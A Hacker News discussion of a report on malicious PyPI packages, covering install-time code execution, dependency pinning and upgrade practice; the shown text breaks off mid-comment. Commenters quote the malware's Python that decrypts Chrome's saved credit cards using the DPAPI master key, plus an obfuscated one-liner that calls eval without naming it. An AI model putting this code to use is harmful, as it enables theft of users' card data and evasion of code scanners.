[HN Gopher] Malicious PyPI packages stealing credit cards and in...
___________________________________________________________________
Malicious PyPI packages stealing credit cards and injecting code
Author : hpb42
Score : 400 points
Date : 2021-08-03 12:01 UTC (10 hours ago)
(HTM) web link (jfrog.com)
(TXT) w3m dump (jfrog.com)
| terom wrote:
| http://webcache.googleusercontent.com/search?q=cache%3Ahttps...
| Google cache still has the malicious package visible FWIW
|
| > This Module Optimises your PC For Python
| toyg wrote:
| _> This Module Optimises your PC For Python_
|
| Well, it does... just not for _your_ Python...
| gunapologist99 wrote:
| All your Pythons are belonging to us
| TheFreim wrote:
| Our python
| qwertox wrote:
| I don't think that it's good to just delete the packages. Same
| goes for Android Apps in the Google Play Store or for Chrome
| Extensions.
|
| These compromised packages should have their page set to a read-
| only mode with downloads/installs disabled, with a big warning
| that they were compromised.
|
| This is especially troublesome with Chrome Extensions and Android
| Apps, where there is no way to find out whether I actually had the
| extension installed and, if I had, what exactly it was.
|
| Chrome Extensions getting automatically removed from the browser,
| instead of being permanently deactivated with a hint about why the
| extension got disabled and can't be activated again, is a problem
| for me. How do I know whether I had a bad extension installed, or
| if personal data has been leaked?
|
| This also applies to PyPI to some degree.
|
| ----
|
| Eventually the downloads should get replaced with a module which,
| when loaded, prints out a well defined warning message and calls
| sys.exit() with a return code which is defined as a
| "vulnerability exception" which a build system can then handle.
| tylfin wrote:
| There is the "Yank" PEP 592 semantic that can be used to mark
| vulnerable packages. Its adoption has been a little slow, but
| I agree, having these packages available and marked accordingly
| makes it easier for security scanning and future detection
| research.
|
| https://www.python.org/dev/peps/pep-0592/
| RulerOf wrote:
| Skimming through that link, it seems that `yank` is for
| pulling _broken_ packages, whereas the suggestion above is to
| explicitly mark them as malicious.
| blamestross wrote:
| Should we call the "mark them malicious" version "Yeet" or
| "Yoink"?
| RulerOf wrote:
| `npm yeet malicious-package`
| gunapologist99 wrote:
| Even better would be to allow their install, but have them
| start up with an immediate panic() sort of function (i.e.,
| print("This package has been found to be malicious; please
| see pypi/evilpackagename for details"); sys.exit(99)) to
| force aborts of any app using those packages.
| blamestross wrote:
| python packages run arbitrary code at install/build time,
| so this isn't viable.
| qwertox wrote:
| It's no longer arbitrary if the PyPI crew is the one who
| controls the code, or did I understand you wrong?
| blamestross wrote:
| Just that it isn't as simple as prepending the lines to the
| code that gets executed. I think I misunderstood you:
| instead of prepending the code, you are suggesting the
| entire compromised package get replaced with `throw "You
| got Hacked"` at import time.
| qwertox wrote:
| Correct, when the program starts to run and imports the
| modules, as nothing will make admins more aware that
| something is really wrong here. Maybe raise an exception
| which, if not handled, executes sys.exit() with a
| predefined code.
|
| And some mechanism to detect this at install/build time
| as well, so that automated build systems can cleanly
| abort a build and issue a specific message, which can then
| be forwarded via email or SMS through some custom code.
|
| The entire package gets replaced by a standardized,
| friendly one. No harmful code gets downloaded.
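A "tombstone" replacement module along these lines might look like the sketch below; the exit code 99 and the exception name are hypothetical illustrations, not any existing PyPI convention:

```python
import sys

VULN_EXIT_CODE = 99  # hypothetical "vulnerability exception" exit code

class MaliciousPackageError(RuntimeError):
    """Raised at import of a pulled package so the failure is loud."""

def tombstone():
    # Body that would replace the real module's top-level code.
    msg = ("This package was removed from PyPI as malicious; "
           "see its project page for details.")
    print(msg, file=sys.stderr)
    raise MaliciousPackageError(msg)

# A build system could map the unhandled exception to the agreed code:
try:
    tombstone()
except MaliciousPackageError:
    exit_code = VULN_EXIT_CODE

print("build aborted with code", exit_code)
```

An interactive run crashes loudly at import, while automation can match on the well-known exit code and page someone.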
| joelbondurant wrote:
| import usafacts; import malware; usafacts.check(malware);
| geofft wrote:
| Anyone can upload anything to PyPI. This is kind of like saying
| that you detected malicious packages on GitHub - the question is
| whether anyone actually ran it.
|
| They say that the packages were _downloaded_ 30,000 times, but
| automated processes like mirrors can easily inflate this. (As can
| people doing the exact sort of research they were doing - they
| themselves downloaded the files from PyPI!) Quoting PyPI
| maintainer Dustin Ingram
| https://twitter.com/di_codes/status/1421415135743254533 :
|
| > *And here's your daily reminder that download statistics for
| PyPI are hugely inflated by mirrors & scrapers. Publish a new
| package today and you'll get 1000 'downloads' in 24 hours without
| even telling anyone about it.*
| yonixw wrote:
| If anyone wonders about the same for NPM, it is around 400.
| That's what happened to my almost-empty package.
|
| https://i.imgur.com/Ryr2voN.png
| Frost1x wrote:
| Part of the issue is that FOSS, libraries, and independent
| package managers and their specific repositories have
| _exploded_ in about every domain. No longer are there a handful
| of places where software and libraries exist. Pick an ecosystem
| and there's probably one or more additional levels of
| package/library management ecosystems below it. Developers have
| really bought into grabbing a package for everything and
| leveraging hundreds and thousands of packages, most of which
| have limited to no sort of vetting. We've had software
| complexity growing over the years, but the one benefit in
| previous years is that it was in fairly concentrated areas
| where many eyes were often watching. You could somewhat rely on
| the fact that someone had looked through and approved such
| additions to a package repo. It's a naive security but there
| were more professional eyes you could leverage, lowering
| overall risk.
|
| Not anymore, it's more of this breakneck speed, leverage every
| package you can to save resources and glue them together
| without looking at them in detail, because the entire reason
| you're using them is because you don't have time. It's not all
| shops, plenty of teams vet or roll their own functionality to
| avoid this but there's a large world of software out there that
| just blindly trusts everything down the chain in an era where
| there should be less trust. Some software shops have never seen
| a package or library they didn't like and will use even trivial
| to implement packages (the benefit of your own implementation
| being you know it's secure and won't change under your feet
| unless an inside threat makes the change). There's a tradeoff
| to externalizing costs and maintenance tech debt onto these
| systems: the cost is that you take on more risk in various
| forms.
| rlpb wrote:
| > Anyone can upload anything to PyPI. This is kind of like
| saying that you detected malicious packages on GitHub - the
| question is whether anyone actually ran it.
|
| There's a bigger social problem here. In many communities it
| has become completely normalized for any dependency to be just
| added from these types of "anyone can upload" repositories
| without any kind of due diligence as to provenance or security.
| It's as if these communities have just given up on that.
|
| For example, if I suggest that a modern web app only use
| dependencies that ship in Debian (a project that does actually
| take this kind of thing seriously), many would laugh me out of
| the building.
|
| The only practical alternative in many cases is to give up
| trying. It's now rare for projects to properly audit their
| dependencies _because_ the community at large isn't rallying
| around doing it. It's a vicious circle.
|
| This kind of incident serves as a valuable regular reminder of
| the risks that these communities are taking. Dismissing this by
| saying "anyone can upload" misses the point.
| oefrha wrote:
| > It's now rare for projects to properly audit their
| dependencies
|
| In the Python ecosystem, it is at least pretty easy to limit
| yourself to a handful of developers you trust (e.g. Django
| developers, Pallets developers, etc.).
|
| In the npm ecosystem, however, I just ran `npx
| create-react-app` and got a node_modules with 1044
| subdirectories, an 11407-line yarn.lock, and "207
| vulnerabilities found" from `yarn audit`. Well, what can you
| possibly do?
| toss1 wrote:
| >> if I suggest that a modern web app only use dependencies
| that ship in Debian (a project that does actually take this
| kind of thing seriously), many would laugh me out of the
| building
|
| And you are more right, and they are more wrong than they
| know.
|
| Not only are malicious inserts in code a problem in
| themselves, if you have failed to properly vet your
| dependencies and it causes real losses for one of your
| users/customers, YOU have created a liability for yourself.
| Sure, many customers may never figure it out, and it might
| take them a while to prove it in court, but if it even gets
| to the point where someone is damaged and notices, and
| decides to do something about it, you have defense costs.
|
| The "whatever" attitude has no place in serious engineering
| of any kind, and anyone with a "move fast and break things"
| attitude (unless these tests are properly sandboxed) shows
| that they are not engaged in any serious engineering.
| tyingq wrote:
| Doesn't installing a python package from PyPI (optionally) run
| some of the code in the package? Like "setup.py" ? I'd take
| advantage of that if I were injecting malicious code in a
| module.
| chriswarbo wrote:
| Yep. In fact, I recently had to deal with this monstrosity
| https://pypi.org/project/awslambdaric whose setup.py invokes
| a shell script https://github.com/aws/aws-lambda-python-
| runtime-interface-c...
|
| That shell script runs 'make && make install' on a couple of
| bundled dependencies, but in principle it could do anything
| https://github.com/aws/aws-lambda-python-runtime-
| interface-c...
| dane-pgp wrote:
| For what it's worth, npm supports an option "ignore-scripts"
| for both "npm install" and "npm ci" (the latter of which
| ensures the installed packages match the integrity hashes
| from the package-lock.json file).
|
| https://docs.npmjs.com/cli/v7/commands/npm-
| install/#ignore-s...
|
| https://docs.npmjs.com/cli/v7/commands/npm-ci/#ignore-
| script...
| codefined wrote:
| Downloading a Python package (as done by scrapers, mirrors
| and security analysts) does not run setup.py. Only if the
| module is installed is this run.
|
| It's analogous to downloading vs. running an executable.
| tyingq wrote:
| Ah, sure. Just making the distinction that you don't have
| to actually use a module within your code: installing
| the module, even if you never use it in your own code, runs
| some of the code in that module.
| Majestic121 wrote:
| Doing a pip install actually runs the setup.py of the
| package for a source dist, which means running an executable.
|
| It's not the case for wheels, though, so you can protect
| yourself by restricting to binary packages: --only-binary.
|
| Also, doing a pip download is not susceptible to this issue,
| but most people do pip install.
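The distinction can be demonstrated directly: building or installing a source distribution means executing its setup.py, so any top-level code in it runs. A minimal simulation (the setup.py body here is hypothetical):

```python
import io
import contextlib

# Stand-in for a source distribution's setup.py. pip executes this
# file when building/installing an sdist, so its top-level statements
# run with the installing user's privileges.
setup_py_source = """
print("top-level code executed at install/build time")
# a real setup.py would go on to call setuptools.setup(...)
"""

buf = io.StringIO()
with contextlib.redirect_stdout(buf):
    # This exec is what "pip install" effectively does for an sdist;
    # "pip download" never reaches this step.
    exec(compile(setup_py_source, "setup.py", "exec"))

captured = buf.getvalue()
print(captured.strip())
```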
| karmicthreat wrote:
| There is a lot of inconsistency in hash behavior across the
| various repos (PyPI, RubyGems) and tools (poetry, bundler).
|
| For a long time poetry didn't even check the hash. So the safer
| option is to just maintain these artifacts yourself, so you know
| what is going on, and have your own policies for maintaining them.
| mm983 wrote:
| Why don't they start a partnership with a security company, like
| they have with a server monitor and Google? Many security vendors
| use Python somewhere (1), so I'm sure there would be someone
| willing to cooperate. Scan all packages uploaded and all updates;
| when there is a detection, put a warning on the page and, in the
| console, a prompt like "this package might contain malicious
| code. continue regardless?" so that typosquatting and code
| hijacking are mitigated.
|
| 1 https://github.com/KasperskyLab?q=&type=&language=python&sor...
|
| https://github.com/CrowdStrike?q=&type=&language=python&sort...
|
| https://github.com/intezer?q=&type=&language=python&sort=
| latch wrote:
| Elixir recently added hex diff, which I've found quite useful.
| E.g.: https://diff.hex.pm/diff/jiffy/1.0.7..1.0.8
| CivBase wrote:
| I wonder how many Python packages have a justifiable reason for
| using `eval()` to begin with. I've been writing Python
| professionally for almost a decade and I've never run into a use
| case where it has been necessary. It's occasionally useful for
| debugging, but that's all I've ever legitimately considered it
| for.
|
| It's neat that JFrog can detect evaluation of encoded strings,
| but I think I'd prefer to just set a static analysis rule which
| prevents devs from using `eval()` in the first place.
| blibble wrote:
| namedtuple used exec()
|
| (I've also used exec() for some nasty bundling of multiple
| python files into one before)
| hiccuphippo wrote:
| I don't think there's a good reason to have eval in interpreted
| languages. Sure the REPL uses it but it could be implemented
| internal to the REPL instead of exposing it in the language.
| banana_giraffe wrote:
| You can always call eval without ever mentioning eval in code:
|
|     __builtins__.__dict__[''.join(chr(x^y^(i+33)) for i,(x,y) in enumerate(zip(*[iter(ord(z) for z in '2vb63qz2')]*2)))]("print('hello, world')")
|
| Maybe there are ways to detect all of the paths, but it feels
| like a tricky quest down lots of rabbit holes to me.
|
| There are also some fairly big packages that use eval(), like
| flask, matplotlib, numba, pandas, and plenty of others. Perhaps
| they could be modified to not use eval, but it might be more
| common than you expect.
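Even far simpler obfuscation defeats a literal-token rule; a hypothetical example where the name is assembled at runtime:

```python
import builtins

# The literal token "eval(" never appears in the source, so a
# grep-style static analysis rule that bans eval would miss this.
hidden = getattr(builtins, "ev" + "al")
result = hidden("6 * 7")
print(result)  # 42
```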
| psanford wrote:
| There are plenty of ways you can obfuscate calls to `eval`.
| `unpickle` is a classic example.
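A minimal illustration of pickle as an eval gadget: `__reduce__` lets an object name any callable for `pickle.loads` to invoke. The payload here is a harmless hypothetical; real malware would substitute something like `os.system`.

```python
import pickle

class Payload:
    def __reduce__(self):
        # pickle serializes this as "call eval('2 + 2') on load",
        # so the code runs on whatever machine unpickles the blob.
        return (eval, ("2 + 2",))

blob = pickle.dumps(Payload())
result = pickle.loads(blob)  # runs eval during unpickling
print(result)
```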
| dailyanchovy wrote:
| Nice writeup, but the title flashes to '(1) New Message' and back
| twice a second. That's kind of silly in my opinion; from whom am
| I expecting a message? I assume from the chatbot at the bottom
| right corner.
|
| Even so, to talk to it I would need to grant it access to some
| personal information.
|
| It all ends up leaving a bitter aftertaste. Whatever the message
| was, why not place it in a block of text somewhere less
| distracting?
|
| I appreciate the writeup however.
| acdha wrote:
| Add these to your hosts file and the page will load a lot
| faster, too:
|
|     0.0.0.0 js.driftt.com
|     0.0.0.0 send.webeyez.com sec.webeyez.com
|     0.0.0.0 splitting.peacebanana.com flaming.peacebanana.com
| cube00 wrote:
| This junk is appearing on more and more web sites, at least
| this one is clearly a bot.
|
| Plenty of sales sites will pretend a human is sending you a
| message, try and talk back and all of a sudden you're in a
| queue waiting for a reply.
|
| Another anti-pattern for the web.
| NullPrefix wrote:
| Well don't be rude, say hi, you never know if it's a person
| on the other end. In that case it's OK to open up about the
| current events in your dog's life.
| rchaud wrote:
| It's a billion-dollar anti-pattern that's been sanitized as
| "conversational commerce". Several large orgs have Intercom,
| Drift or other popups infesting their site....by choice!
| avian wrote:
| > This junk is appearing on more and more web sites, at least
| this one is clearly a bot.
|
| This is the first time I've seen a page flashing the title
| like that. Extremely annoying and I closed the page before
| reading the article to the end. It reminded me of the times
| when pages used to do that with the browser status bar on the
| bottom of the window.
| dailyanchovy wrote:
| Yeah. The sad thing is, I've never used a single chatbot that
| was actually helpful. I naturally don't go looking for
| conversations with chatbots, but recently more and more
| companies decided to shut down their email address. So the
| only way to resolve an issue is by either talking to a
| chatbot and then a person (hopefully), or by phoning them
| (and I'd rather not).
|
| Some chatbots even refuse to let me talk to a person at all
| due to a bug (the Dutch water utility service). Another asks
| you to write a message to the human representative and then
| discards it due to a bug (bol.com).
| jimmaswell wrote:
| I've had some success finding the pages or processes I need
| on a site with virtual assistants, but the design of the
| website had failed in the first place if I had to resort to
| that.
| ConcernedCoder wrote:
| holy crap the stuff in: AppData\Local\Google\Chrome\User
| Data\default\Web Data ... wtf are you thinking google?
| at_a_remove wrote:
| I have some pretty complex feelings about this.
|
| Many people end up at a given programming language because they
| are fleeing something else, rather than being necessarily drawn
| to it, and I know that in some senses, Python was my reaction to
| having to deal with what I didn't like about Perl. One of the
| larger factors was dealing with CPAN. I was always having to hunt
| down modules, which would do maybe seventy percent of what I
| needed, or another module that would cover a _different_
| seventy percent. And then comes the question of, "Can I get this
| to run on Windows?"
|
| Meanwhile, Python made hay with its enormous standard library and
| certainly xkcd made many references to it. Now people tell me
| that the standard library is where code goes to die and I get sad
| all over again ...
| smallerfish wrote:
| ```
| def cs():
|     master_key = master()
|     login_db = os.environ['USERPROFILE'] + os.sep + \
|         r'AppData\Local\Google\Chrome\User Data\default\Web Data'
|     shutil.copy2(login_db, "CCvault.db")
|     conn = sqlite3.connect("CCvault.db")
|     cursor = conn.cursor()
|     try:
|         cursor.execute("SELECT * FROM credit_cards")
|         for r in cursor.fetchall():
|             username = r[1]
|             encrypted_password = r[4]
|             decrypted_password = dpw(encrypted_password, master_key)
|             expire_mon = r[2]
|             expire_year = r[3]
| ```
|
| Where does master_key come from here? Is chrome encryption of
| sensitive information really as weak as that?
| hchasestevens wrote:
| It appears to be:
|
|     def master():
|         try:
|             with open(os.environ['USERPROFILE'] + os.sep +
|                       r'AppData\Local\Google\Chrome\User Data\Local State',
|                       "r", encoding='utf-8') as f:
|                 local_state = f.read()
|                 local_state = json.loads(local_state)
|         except:
|             pass
|         master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
|         master_key = master_key[5:]
|         master_key = ctypes.windll.crypt32.CryptUnprotectData(
|             (master_key, None, None, None, 0)[1])
|         return master_key
| oefrha wrote:
| I found a copy on a PyPI mirror and at a glance couldn't find
| any of the malicious code mentioned:
| https://pypi.tuna.tsinghua.edu.cn/packages/99/84/7f9560403cd...
|
| Also a copy of noblesse2, which I didn't bother to look into
| due to obfuscation:
| https://pypi.tuna.tsinghua.edu.cn/packages/15/59/cbdeed656cf...
| RL_Quine wrote:
| What do you expect it to be "encrypted" with? Unless the user
| is entering a password every time they start the browser,
| there's nothing unique to a system that other malware can't
| just extract and use to decrypt the database.
| MikeKusold wrote:
| On Mac, you could store the master key in the Keychain. I've
| been off of Windows for almost a decade so I'm not sure if
| they have a similar feature.
|
| > Keychain items can be shared only between apps from the
| same developer.
|
| https://support.apple.com/guide/security/keychain-data-
| prote...
| balls187 wrote:
| Windows doesn't have a system-level key store.
|
| Instead, the Windows APIs provide a symmetric encryption API
| (DPAPI) that allows developers to supply plain text and
| receive cipher text.
|
| It would then be up to developers to persist the cipher
| text.
|
| DPAPI master key is protected by the OS, behind User
| Credentials.
| blibble wrote:
| isn't it per user though, instead of per developer (like
| apple)?
|
| a dodgy pypi package that can call CryptUnprotectData too
| ok123456 wrote:
| Pale Moon on Linux uses the GNOME keyring. You have to auth
| against that to get access to your saved passwords.
| smallerfish wrote:
| Right, but I wouldn't have expected that processes outside of
| chrome could get at its internally managed db (or encrypted
| properties), especially if it's using an authenticated
| (chrome) user profile.
|
| Windows doesn't have any application firewalls by default? I
| thought that was the whole thing that came in with Vista that
| people were upset about. (Of course, thinking it through,
| Linux isn't any better, assuming the process is running as
| the same user.)
| ncann wrote:
| If you have untrusted code running on your computer,
| especially with admin privilege, then it's already game
| over no matter what you do. Any kind of stored secret can
| be extracted, and any kind of typed in secret can be
| keylogged.
| HALtheWise wrote:
| This was definitely true a decade ago, but secure
| elements in processors have opened up all sorts of
| options. Unfortunately, taking advantage of those is one
| place where mobile operating systems are far ahead of
| desktops.
| ncann wrote:
| Mobile OS security works by clamping down hard on what
| the local user can do, by severely restricting your
| freedom on what you can do with your device, to the point
| where you can't even access most of the device's file
| system. It works under the assumption and reality that
| 99% of users out there don't have root access on their
| phone. At the other end of the spectrum we have the PC, where
| we have full freedom to do what we want, just a
| "sudo" or "run as admin" away, but that comes with a
| price.
| progmetaldev wrote:
| I know in Chrome on Windows, I am asked for my Windows
| login password if I want to view any saved passwords.
| Really hope that's not just a "UI" feature, and those
| passwords really are encrypted.
| gruez wrote:
| >Really hope that's not just a "UI" feature, and those
| passwords really are encrypted.
|
| It's definitely a ui feature. If you want to extract the
| password all you have to do is visit the login page, open
| the developer console, and type
| $("input[type=password]").value
| progmetaldev wrote:
| I meant more at rest. I think even if you use an
| extension like LastPass with a policy that the user can't
| see the password, it's still going to show up in
| developer tools under the POST.
| soheil wrote:
| I feel like they could have done a better job hiding the code.
| Even something as simple as base64-encoding the code, storing it
| as a constant, and then doing an eval. Scanning for something
| like the table name credit_cards is simple enough to expose this
| exploit. Now I'm worried about what other exploits of similar
| form are out there that remain undetected.
| yardstick wrote:
| This is why our build systems don't use public repositories
| directly, and why we always pin to an exact version. Any third
| party dependencies (js/python/java/c/you-name-it) are manually
| uploaded to our Artifactory server, which itself has no internet
| access. All third-party libraries are periodically checked for
| new versions, any security announcements etc, and only if we are
| happy do we update the internal repo.
|
| It has been a bit of a challenge, especially with js & node and
| quite literally thousands of dependencies for a single library we
| want to use. In such cases we try to avoid the library or look
| for a static/prepackaged version, but even then I don't feel
| particularly comfortable.
|
| I should really start specifying checksums too.
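The checksum step can be sketched like this, assuming a digest recorded at vetting time and stored alongside the pinned version (the file bytes here are placeholders, not a real artifact):

```python
import hashlib

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Digest recorded when the artifact was reviewed and uploaded to the
# internal repo (placeholder bytes standing in for wheel contents).
artifact_at_vetting = b"wheel bytes as reviewed"
pinned_digest = sha256_hex(artifact_at_vetting)

# Later, the build system fetches the artifact again and refuses
# anything that changed upstream, even at the same version number.
downloaded = b"wheel bytes as reviewed"
if sha256_hex(downloaded) != pinned_digest:
    raise SystemExit("artifact no longer matches vetted checksum")
print("checksum ok")
```

pip's hash-checking mode (`--require-hashes` with hashes in requirements files) automates the same idea.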
| specialist wrote:
| I did a bunch of nodejs stuff at my last gig. These teams had
| the practice of keeping packages up to date. Drove me frikkin
| nuts. So much churn, chaos.
|
| Is this a JavaScript thing? Carried over from frontend
| development?
|
| Exasperated, I finally stopped advocating for locking
| everything down. Everyone treated me like I was crazy.
| (Reproducible builds?? Pfft!!)
|
| Happens with enterprisey Java, Spring, Maven projects too. (I
| can't even comment on Python projects; I was just happy when I
| could get them to run.)
|
| What's going on? FOMO?
|
| Lock ~~Look~~ down dependencies. Only upgrade when absolutely
| necessary. Keep things simple to facilitate catching regression
| bugs and such.
|
| Oh well. I moved on. I don't miss it one bit.
| _pmf_ wrote:
| They have no concept of ever needing to reproduce a build.
| And they are probably right if you do continuous development
| of some SaaS stuff.
| aranchelk wrote:
| I've heard the argument that it's not worth spending the
| time to get all aspects of your build environment into
| version control for 100% reproducible builds, but saying
| "I shouldn't be bothered to know what my upstream deps
| are" is pretty sad (hopefully rare).
|
| Even with the continuous deploy stuff, I think you're
| giving too much benefit of the doubt. If an upstream non-
| pinned change brings down something critical (e.g.
| payments), you'll revert the change in source, rebuild,
| release, the site is still broken. If you keep old
| artifacts you can push one of those, now you're not really
| doing continuous deployment, and you won't be again until
| you finish root cause analysis, and since you'll never see
| the relevant change in your source code, it could take a
| while.
| cube00 wrote:
| Good luck when your security department starts running XRay
| and demands all your dependencies are at the latest versions
| all the time because every second release of a package is
| reported as vulnerable.
| cyberpunk wrote:
| But.... We're right though? I mean there is some wiggle
| room, if some lib has a security hole in some functionality
| that's not actually being used, but it's all about risk. We
| gate deploys to prod over something like XRay or LifeCycle
| and the frustration it causes our devs is much cheaper than
| deploying something we know is insecure to prod and would
| cause us to fail an audit or something (let alone get
| pwned).
| TechBro8615 wrote:
| There was a recent discussion on HN about `npm audit` and
| its overwhelming number of false positive vulnerabilities
| [0]. I can see a policy like this being frustrating in
| the case of `npm dependencies`. Is this something you
| deal with?
|
| [0] https://news.ycombinator.com/item?id=27761334
| specialist wrote:
| Ya. That's a tough one. Philosophically, I totally support
| vetting. I don't know how we'd make it useful.
|
| Pondering...
|
| One past team had a weekly formal "log bash" ritual. I
| _LOVED_ it.
|
| That ops team kept track of everything. Any unexplained log
| entry had to be explained or eliminated. They kept track of
| explained entries on their end, so we wouldn't waste time
| rehashing stuff. I imagine their monitoring tools supported
| filters for squelching noisy explained log entries.
|
| Maybe the security team which owns XRay could do something
| similar.
| Merad wrote:
| > Only upgrade when absolutely necessary.
|
| Gotta disagree with this part. If you're making a web app
| package updates really need to be done on a regular cadence,
| ideally every quarter, but twice a year at minimum IMO. In
| the .Net world at least it feels like most responsible open
| source maintainers make it relatively painless to upgrade
| between incremental major versions (e.g. v4 -> v5). If you
| put off upgrades until someone holds a gun to your head so
| that your dependencies are years out of date, you're much
| more likely to experience painful upgrades that require a lot
| of work.
| wereHamster wrote:
| Everyone I know uses some form of lock file, and most of the
| modern programming languages support it.
|
| As for upgrading only when absolutely necessary, let's be
| honest, nothing is absolutely necessary. If the software is
| old, or slow, or buggy, well dear users you'll just have to
| deal with it.
|
| In my experience however, it's easier to keep dependencies
| relatively up to date all the time, and do the occasional
| change that goes along with each upgrade, than waiting five
| years until it's absolutely necessary, at which point
| upgrading will be a nightmare.
|
| I'd much rather spend ten minutes each week reading through the
| short changelogs of 5 dependencies to check that, yes, the
| changes are simple enough that they can be merged without
| fear, and with the confidence that it's compatible with all
| the other up-to-date dependencies.
| polynomial wrote:
| In my experience although lock files are widely used in
| Node development, utilizing the lock files as part of a
| reproducible build system is far less prevalent in the
| wild. In fact, the majority of Node development I've seen
| eschews reproducible builds on the basis that things are
| moving too fast for that anyway, as if it were somehow a
| DRY violation, but for CICD. Would love to hear from Node
| shops that have established well followed reproducible
| CICD.
| specialist wrote:
| How do you deal with regressions?
|
| For example, we once upgraded the redis client. One brief
| revision of the parser submodule had an apparent resource
| leak (I can't imagine how...), causing all of our services
| to ABEND after a few hours.
|
| Because everything is updated aggressively, and there's so
| many dependencies, we couldn't easily back out changes.
|
| --
|
| FWIW, Gilt's "Test Into Production" strategy is the first
| and only sane regime I've heard for "Agile". Potentially
| reasonable successor to the era when teams did actual QA &
| Test.
|
| Sorry, I don't have a handy cite. I advocated for Test Into
| Prod. Alas, we didn't get very far before our ant farm got
| another good shake.
| wereHamster wrote:
| When I see a regression, I look at what was recently
| updated (in the past hours, days), and it's usually one
| of those packages. Because frequent updates tend to be
| independent, it's usually not difficult to revert that
| change (eg. if I update react and lodash at the same
| time, chances are really good that I can revert one of
| those changes independently without any issues)
| actually_a_dog wrote:
| This is the way.
|
| Also, you should try to update as few things as possible
| at once, and let your changes "soak" into production for
| a while before going in all "upgrade ALL the things!"
|
| Why? Well, sometimes things that fail take a while to
| actually start showing you symptoms. Sometimes, the
| failure itself takes a while to propagate, simply due to
| the number of servers you have.
|
| And, one of these days, cosmic rays, or some other random
| memory/disk error is going to flip a critical bit in some
| crucial file in that neato library you depend on. And,
| oh, the fouled up build is only going to go out to a
| subset of your machines.
|
| You'll be glad you didn't "upgrade ALL the things!" when
| any of these things ends up happening to you.
| specialist wrote:
| Totally agree. That's why I'm asking whether compulsively
| updating modules is a JavaScript, nodejs, whatever
| pathos.
|
| This team pushed multiple changes to prod per day. And
| the load balancer with autoscaling is bouncing instances
| on its own. And, and, and...
|
| So resource leaks were being masked. It was only noticed
| during a lull in work.
|
| And then because so many releases had passed, delta
| debugging was a lot tougher. And then because nodejs &
| npm has a culture of one module per line of source
| (joking!), figuring out which module to blame took even
| more time.
|
| I think continuous deploys are kinda cool. But not
| without a safety net of some sort.
| mathattack wrote:
| Both extremes are bad. If you never change anything, you
| are left behind on a lot of security updates and bug fixes.
| The longer you wait the harder it is to move.
|
| The "stay current" model comes with risks too. It's just a
| matter of figuring out which manner has the better value to
| risk trade off, and how to mitigate the risks.
| goodpoint wrote:
| > It's just a matter of figuring out which manner has the
| better value to risk trade off
|
| This is also bad.
|
| If you want to have both stability/reliability and also
| receive security updates you need somebody to track
| security issues and selectively backport patches.
|
| This is what some Linux distributions do: mainly Debian,
| Ubuntu, and the paid versions of SuSE, Red Hat, and so on
| snapetom wrote:
| The solution was, and always been, to have someone review
| every commit to the libraries that your app uses, and
| raise red flags for security vulnerabilities and breaking
| changes to your application.
|
| Oh, boy, I would love to work for a company that has
| someone like that. Know of any? At the least, I would
| love for a company to just give me time to review library
| changes with any sort of detail.
| actually_a_dog wrote:
| One company I worked for had a bot that would
| periodically go and try to upgrade each individual app
| dependency, then see if everything built and passed
| tests.
|
| If it got a green build, it would make a PR with the
| upgrades, which you could then either choose to merge, or
| tell the bot to STFU about that dependency (or
| optionally, STFU until $SOME_NEWER_VERSION or higher is
| available, or there's a security issue with the current
| version).
|
| If not, it would send a complain-y email to the dev team
| about it, which we could either silence or address by
| manually doing the upgrade.
|
| This worked out rather well for us. I think the net
| effect of having the bot was to make sure we devs
| actually _paid attention_ to what versions of our
| dependencies we were using.
| You-Are-Right wrote:
| This is not a solution.
| dheera wrote:
| I get notifications every other week about my NodeJS packages
| having security vulnerabilities, and so I upgrade.
|
| I'm not sure why NodeJS devs are so bad at security compared
| to say C++ devs. It's not like I'm getting asked to upgrade
| libstdc++ and eigen all the time ...
| ComputerGuru wrote:
| I'm not going to get into barriers for entry and what kind
| of developer chooses which language, but C/C++ has always
| eschewed having unnecessary dependencies (originally
| because dependency management is hard, but that's no longer
| the real reason - it's just become baked into the culture).
| Even if you copy and paste hundreds of lines of code (or
| individual source files) the way you think about and treat
| them is very different from when they are external to your
| code base. You own (your copy of) them now, and at the very
| least, you familiarize yourself with their internals (and
| you wouldn't copy and paste something that had its own
| dependencies). Actual (dynamically linked) dependencies
| don't export objects with super brittle interfaces so much
| as they do expose very stable, carefully designed, and as
| minimal as possible boundaries for interfacing with their
| internals. Anything crossing API boundaries is considered
| leaving/entering the trusted domain, and lifespans of
| pointers and references in a non-garbage collected language
| guide/force you to eschew incorporating external libraries
| into your code globally and isolate the interaction (and
| therefore, the attack surface area) between your code and
| external code.
|
| Then there's the type system. Despite having some of the
| weakest type systems of strongly typed languages, C (to
| some extent) and C++ (especially modern C++) are still
| light years ahead of what even Typescript buys you because
| they don't offer the same escape hatches or "fingers
| crossed this TS interface matches the JS object that we are
| binding it to, but two lines from here, no one will
| remember that this isn't actually a native TS class and
| that this non-nullable field might actually be null because
| the compile-time type checking system can't verify this
| even at runtime without manual user validation because the
| MS TS team refuses to transpile type validation because
| they insist on zero overhead even though JS is not a low
| level or systems language."
|
| More than anything else however, developers of statically
| typed languages tend to fundamentally disagree with the
| idea of "move fast and break often" and will put off
| changes for years if they're not at least 90% sure it's
| _the_ correct solution (and even when they end up wrong,
| it's still far better than someone that says "who cares if
| it's _the_ or even just _an actually correct_ solution,
| it's still _a_ solution and we can always revisit this
| later").
| OJFord wrote:
| I tend to assume OSS contributors/maintainers are working
| generally to make things better, features I'm not using/don't
| need aside, they're fixing bugs (that I might not know I'm
| hitting/about to hit), patching security holes, etc. - so
| that's one for the 'pro-upgrading' column.
|
| Against that, sure, there might be something bad in the new
| release (maliciousness aside even, there might be a new
| bug!). But.. there might be in the old one I've pinned to as
| well? Assuming I'm not vetting everything (because how many
| places are, honestly) I have no reason to distrust the new
| version any more than my current one.
|
| Reproducible builds are an orthogonal issue? You can still
| keep your dependencies' versions updated with fully
| reproducible builds. Ours aren't, but we do pin to specific
| versions (requirements.txt & yarn.lock), and keep the former
| up to date with pyup (creates and tests a branch with the
| latest version) and up to date within semver minor versions
| just with yarn update (committed automatically since in
| theory it should be safe, had to revert only occasionally).
| actually_a_dog wrote:
| I agree. Locking things down is the way to go, when it comes
| to safety.
|
| The downside, however, is that, by design, you end up with
| packages that don't get upgraded regularly. That can cause
| problems down the road when you decide you _do_ want to
| upgrade those packages.
|
| For instance, there might be breaking changes, because you're
| jumping major versions. Of course, breaking changes are
| always a problem, but, if you're not regularly upgrading
